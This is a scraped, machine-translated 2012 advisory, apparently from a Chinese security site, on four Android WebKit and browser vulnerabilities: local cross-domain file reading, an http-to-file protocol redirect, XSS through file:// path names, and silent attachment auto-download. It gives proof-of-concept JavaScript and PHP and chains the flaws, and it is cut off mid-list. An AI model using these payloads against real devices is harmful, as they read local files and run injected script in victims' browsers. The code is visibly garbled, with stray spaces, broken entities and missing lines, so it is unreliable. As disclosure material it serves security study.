Android webkit XSS cross-domain Auto-Download vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201233071
Type myhack58
Reporter 佚名
Modified 2012-02-10T00:00:00


Android Multiple Vulnerabilities

Author: []

Release Date: 2012/2/8


Ph4nt0m Webzine 0x06 has been


three papers on the android application security about the development

environment,browser security, inter-application communication. And published

a lot of 0days:

[0day-NO. 0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local

file. demo:


var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');


} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP',

'Microsoft. XMLHTTP',

'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0',

'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i<versions. length; i++) {

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}




//xmlhttp. open("GET", "file:///// default. prop", false);

//xmlhttp. open("GET", "", false);

xmlhttp. send(null);

var ret = xmlhttp. responseText;



[0day-NO. 1] android-webkit, cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe>


function init(){

f. location = "file:///default. prop";


setTimeout(init,5 0 0 0)


location.php codz:

<? php

header("Location:file:///80vul. com");

?& gt;

[0day-NO. 2] The android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory

and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul. com/<script>alert(1);</script>

[0day-NO. 3] android-browser/firefox auto download the file vulnerability

android-browser/firefox to Handle the Content-Disposition: attachment, lack of

safety tips. So through this vul allows users to automatically download the

evil html file to the local directory.

test this code:



header("Content-Disposition: attachment:filename=autodown.htm");




print $data;

?& gt;

the local file name and the path:

android 1. x - > /sdcard/download/autodown.html

android 2. x-3. x - > /sdcard/download/autodown.htm

android 4.0 - > /sdcard/download/autodown.php

firefox --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:


//[0day-NO. 1]+[0day-NO. 2]

<iframe name=f src="location.php" ></iframe>


function init(){

f. location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";


setTimeout(init,5 0 0 0)



//[0day-NO. 1]+[0day-NO. 3]

[1] [2] [3] next